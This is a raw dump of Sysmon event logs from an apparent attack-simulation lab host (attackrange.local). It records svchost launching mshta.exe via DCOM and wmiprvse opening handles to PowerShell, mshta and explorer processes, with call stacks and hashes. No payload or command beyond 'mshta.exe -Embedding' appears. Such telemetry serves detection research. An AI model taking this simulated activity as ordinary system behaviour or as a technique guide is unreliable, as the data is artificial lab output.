15:59:31.647{7901BC46-4986-6008-0C00-00000000A301}6084504C:\Windows\system32\svchost.exe{7901BC46-4997-6008-2B00-00000000A301}2496C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000025617Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4984-6008-0500-00000000A301}640756C:\Windows\system32\csrss.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000025616Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-4986-6008-0C00-00000000A301}608724C:\Windows\system32\svchost.exe{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000025615Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.647{7901BC46-5363-6008-5C06-00000000A301}4084C:\Windows\System32\mshta.exe11.00.14393.2007 (rs1_release.171231-1800)Microsoft (R) HTML Application hostInternet ExplorerMicrosoft CorporationMSHTA.EXEC:\Windows\System32\mshta.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{7901BC46-4A89-6008-6879-0C0000000000}0xc79682HighMD5=5CED5D5B469724D9992F5E8117ECEFB5,SHA256=9D58F407AC581DB4A39066F7CB549BF73709EC3D81EF352801C9FB0235EA7FBC,IMPHASH=BECF3D88380DC97C52B1C2E7B1BCCF4B{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x800000000000000025614Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5B06-00000000A301}6336C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025613Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5A06-00000000A301}6212C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025612Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5362-6008-5906-00000000A301}6304C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025611Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025610Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025609Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025608Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025607Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025606Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025605Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025604Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025603Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025602Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025601Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025600Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025599Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025598Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:31.632{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025597Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 